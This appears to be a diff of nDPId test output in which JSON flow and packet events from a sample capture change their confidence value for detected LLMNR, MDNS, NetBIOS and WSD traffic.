00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":12529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"thread_ts_msec":12529,"pkt":"MzMAAQADCAAn5uVZht1gD+kJACURAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQAD+OUU6wAl\/+MDXAAAAAEAAAAAAAALTVNFREdFV0lOMTAAAP8AAQ=="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":12529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":12529,"pkt":"AQBeAAD7CAAn5uVZCABFAABlaF4AAAERZCAKAAIP4AAA+xTpFOkAUYkoAACEAAAAAAIAAAAAC01TRURHRVdJTjEwBWxvY2FsAAAcAAEAAAA8ABD+gAAAAAAAAMUNUZ+WpOEIwAwAAQABAAAAPAAECgACDw=="} -00658{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} +00658{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} 00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":12529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":12529,"pkt":"AQBeAAD8CAAn5uVZCABFAAA5pMYAAAERJ+MKAAIP4AAA\/PjlFOsAJZ66A1wAAAABAAAAAAAAC01TRURHRVdJTjEwAAD\/AAE="} -00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":12530,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":135,"pkt_l4_len":81,"thread_ts_msec":12530,"pkt":"MzMAAAD7CAAn5uVZht1gATieAFERAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAD7FOkU6QBR6VkAAIQAAAAAAgAAAAALTVNFREdFV0lOMTAFbG9jYWwAABwAAQAAADwAEP6AAAAAAAAAxQ1Rn5ak4QjADAABAAEAAAA8AAQKAAIP"} -00672{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":12529,"flow_last_seen":12530,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":12530,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} +00672{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":12529,"flow_last_seen":12530,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":12530,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} 00549{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12827,"flow_last_seen":12827,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":12827,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":12827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":12827,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAABgHOwAAIARBJQKAAIPCgAC\/wCJAIkATEdqnCkpEAABAAAAAAABIEVORkRFRkVFRUhFRkZIRUpFT0RCREFDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAYAAAoAAg8="} -00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12827,"flow_last_seen":12827,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":12827,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12827,"flow_last_seen":12827,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":12827,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":12827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":12827,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAABgHO0AAIARBJMKAAIPCgAC\/wCJAIkATMtnnCopEAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAaAAAoAAg8="} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":1091,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01911{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":13118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1153,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1153,"pkt_l4_len":1099,"thread_ts_msec":13118,"pkt":"MzMAAAAMCAAn5uVZht1gB0PFBEsRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dYOdgRLOdU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiIHhtbG5zOndzZHA9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDYvMDIvZGV2cHJvZiIgeG1sbnM6cHViPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvcHViLzIwMDUvMDciPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvSGVsbG88L3dzYTpBY3Rpb24+PHdzYTpNZXNzYWdlSUQ+dXJuOnV1aWQ6YWMzNzRhY2YtOTJhYi00YWY1LWJkZDEtOTQ5ODVkYWViNDA3PC93c2E6TWVzc2FnZUlEPjx3c2Q6QXBwU2VxdWVuY2UgSW5zdGFuY2VJZD0iNDYiIFNlcXVlbmNlSWQ9InVybjp1dWlkOjc2NzM4OWUwLWVlOWEtNGMxYy1iOTAyLTIwY2I4MWQyMDNlMCIgTWVzc2FnZU51bWJlcj0iMSI+PC93c2Q6QXBwU2VxdWVuY2U+PC9zb2FwOkhlYWRlcj48c29hcDpCb2R5Pjx3c2Q6SGVsbG8+PHdzYTpFbmRwb2ludFJlZmVyZW5jZT48d3NhOkFkZHJlc3M+dXJuOnV1aWQ6NzQ3ZjNkOTYtNjhhNy00M2YxLThjYmUtZThkNmRhZGQwMzU4PC93c2E6QWRkcmVzcz48L3dzYTpFbmRwb2ludFJlZmVyZW5jZT48d3NkOlR5cGVzPndzZHA6RGV2aWNlIHB1YjpDb21wdXRlcjwvd3NkOlR5cGVzPjx3c2Q6WEFkZHJzPmh0dHA6Ly9bZmU4MDo6YzUwZDo1MTlmOjk2YTQ6ZTEwOF06NTM1Ny83NDdmM2Q5Ni02OGE3LTQzZjEtOGNiZS1lOGQ2ZGFkZDAzNTgvPC93c2Q6WEFkZHJzPjx3c2Q6TWV0YWRhdGFWZXJzaW9uPjI8L3dzZDpNZXRhZGF0YVZlcnNpb24+PC93c2Q6SGVsbG8+PC9zb2FwOkJvZHk+PC9zb2FwOkVudmVsb3BlPg=="} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":1091,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":1091,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":1073,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":13118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1115,"pkt_l4_len":1081,"thread_ts_msec":13118,"pkt":"AQBef\/\/6CAAn5uVZCABFAARN4IUAAAER2REKAAIP7\/\/\/+vnVDnYEOdZOPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczpzb2FwPSJodHRwOi8vd3d3LnczLm9yZy8yMDAzLzA1L3NvYXAtZW52ZWxvcGUiIHhtbG5zOndzYT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nIiB4bWxuczp3c2Q9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5IiB4bWxuczp3c2RwPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA2LzAyL2RldnByb2YiIHhtbG5zOnB1Yj0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5kb3dzL3B1Yi8yMDA1LzA3Ij48c29hcDpIZWFkZXI+PHdzYTpUbz51cm46c2NoZW1hcy14bWxzb2FwLW9yZzp3czoyMDA1OjA0OmRpc2NvdmVyeTwvd3NhOlRvPjx3c2E6QWN0aW9uPmh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5L0hlbGxvPC93c2E6QWN0aW9uPjx3c2E6TWVzc2FnZUlEPnVybjp1dWlkOmZhMTdjZDkwLThmMzktNGY1Yi05ZTI4LWJmZjA4ZmI1Y2QwZTwvd3NhOk1lc3NhZ2VJRD48d3NkOkFwcFNlcXVlbmNlIEluc3RhbmNlSWQ9IjQ2IiBTZXF1ZW5jZUlkPSJ1cm46dXVpZDo3NjczODllMC1lZTlhLTRjMWMtYjkwMi0yMGNiODFkMjAzZTAiIE1lc3NhZ2VOdW1iZXI9IjEiPjwvd3NkOkFwcFNlcXVlbmNlPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOkhlbGxvPjx3c2E6RW5kcG9pbnRSZWZlcmVuY2U+PHdzYTpBZGRyZXNzPnVybjp1dWlkOjc0N2YzZDk2LTY4YTctNDNmMS04Y2JlLWU4ZDZkYWRkMDM1ODwvd3NhOkFkZHJlc3M+PC93c2E6RW5kcG9pbnRSZWZlcmVuY2U+PHdzZDpUeXBlcz53c2RwOkRldmljZSBwdWI6Q29tcHV0ZXI8L3dzZDpUeXBlcz48d3NkOlhBZGRycz5odHRwOi8vMTAuMC4yLjE1OjUzNTcvNzQ3ZjNkOTYtNjhhNy00M2YxLThjYmUtZThkNmRhZGQwMzU4Lzwvd3NkOlhBZGRycz48d3NkOk1ldGFkYXRhVmVyc2lvbj4yPC93c2Q6TWV0YWRhdGFWZXJzaW9uPjwvd3NkOkhlbGxvPjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4="} -00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":1073,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":13118,"flow_last_seen":13118,"flow_idle_time":200000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":1073,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":13118,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 01861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":13322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1115,"pkt_l4_len":1081,"thread_ts_msec":13322,"pkt":"AQBef\/\/6CAAn5uVZCABFAARN4IYAAAER2RAKAAIP7\/\/\/+vnVDnYEOdZOPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczpzb2FwPSJodHRwOi8vd3d3LnczLm9yZy8yMDAzLzA1L3NvYXAtZW52ZWxvcGUiIHhtbG5zOndzYT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nIiB4bWxuczp3c2Q9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5IiB4bWxuczp3c2RwPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA2LzAyL2RldnByb2YiIHhtbG5zOnB1Yj0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5kb3dzL3B1Yi8yMDA1LzA3Ij48c29hcDpIZWFkZXI+PHdzYTpUbz51cm46c2NoZW1hcy14bWxzb2FwLW9yZzp3czoyMDA1OjA0OmRpc2NvdmVyeTwvd3NhOlRvPjx3c2E6QWN0aW9uPmh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5L0hlbGxvPC93c2E6QWN0aW9uPjx3c2E6TWVzc2FnZUlEPnVybjp1dWlkOmZhMTdjZDkwLThmMzktNGY1Yi05ZTI4LWJmZjA4ZmI1Y2QwZTwvd3NhOk1lc3NhZ2VJRD48d3NkOkFwcFNlcXVlbmNlIEluc3RhbmNlSWQ9IjQ2IiBTZXF1ZW5jZUlkPSJ1cm46dXVpZDo3NjczODllMC1lZTlhLTRjMWMtYjkwMi0yMGNiODFkMjAzZTAiIE1lc3NhZ2VOdW1iZXI9IjEiPjwvd3NkOkFwcFNlcXVlbmNlPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOkhlbGxvPjx3c2E6RW5kcG9pbnRSZWZlcmVuY2U+PHdzYTpBZGRyZXNzPnVybjp1dWlkOjc0N2YzZDk2LTY4YTctNDNmMS04Y2JlLWU4ZDZkYWRkMDM1ODwvd3NhOkFkZHJlc3M+PC93c2E6RW5kcG9pbnRSZWZlcmVuY2U+PHdzZDpUeXBlcz53c2RwOkRldmljZSBwdWI6Q29tcHV0ZXI8L3dzZDpUeXBlcz48d3NkOlhBZGRycz5odHRwOi8vMTAuMC4yLjE1OjUzNTcvNzQ3ZjNkOTYtNjhhNy00M2YxLThjYmUtZThkNmRhZGQwMzU4Lzwvd3NkOlhBZGRycz48d3NkOk1ldGFkYXRhVmVyc2lvbj4yPC93c2Q6TWV0YWRhdGFWZXJzaW9uPjwvd3NkOkhlbGxvPjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4="} 01911{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":13322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1153,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1153,"pkt_l4_len":1099,"thread_ts_msec":13322,"pkt":"MzMAAAAMCAAn5uVZht1gB0PFBEsRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dYOdgRLOdU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiIHhtbG5zOndzZHA9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDYvMDIvZGV2cHJvZiIgeG1sbnM6cHViPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvcHViLzIwMDUvMDciPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvSGVsbG88L3dzYTpBY3Rpb24+PHdzYTpNZXNzYWdlSUQ+dXJuOnV1aWQ6YWMzNzRhY2YtOTJhYi00YWY1LWJkZDEtOTQ5ODVkYWViNDA3PC93c2E6TWVzc2FnZUlEPjx3c2Q6QXBwU2VxdWVuY2UgSW5zdGFuY2VJZD0iNDYiIFNlcXVlbmNlSWQ9InVybjp1dWlkOjc2NzM4OWUwLWVlOWEtNGMxYy1iOTAyLTIwY2I4MWQyMDNlMCIgTWVzc2FnZU51bWJlcj0iMSI+PC93c2Q6QXBwU2VxdWVuY2U+PC9zb2FwOkhlYWRlcj48c29hcDpCb2R5Pjx3c2Q6SGVsbG8+PHdzYTpFbmRwb2ludFJlZmVyZW5jZT48d3NhOkFkZHJlc3M+dXJuOnV1aWQ6NzQ3ZjNkOTYtNjhhNy00M2YxLThjYmUtZThkNmRhZGQwMzU4PC93c2E6QWRkcmVzcz48L3dzYTpFbmRwb2ludFJlZmVyZW5jZT48d3NkOlR5cGVzPndzZHA6RGV2aWNlIHB1YjpDb21wdXRlcjwvd3NkOlR5cGVzPjx3c2Q6WEFkZHJzPmh0dHA6Ly9bZmU4MDo6YzUwZDo1MTlmOjk2YTQ6ZTEwOF06NTM1Ny83NDdmM2Q5Ni02OGE3LTQzZjEtOGNiZS1lOGQ2ZGFkZDAzNTgvPC93c2Q6WEFkZHJzPjx3c2Q6TWV0YWRhdGFWZXJzaW9uPjI8L3dzZDpNZXRhZGF0YVZlcnNpb24+PC93c2Q6SGVsbG8+PC9zb2FwOkJvZHk+PC9zb2FwOkVudmVsb3BlPg=="} 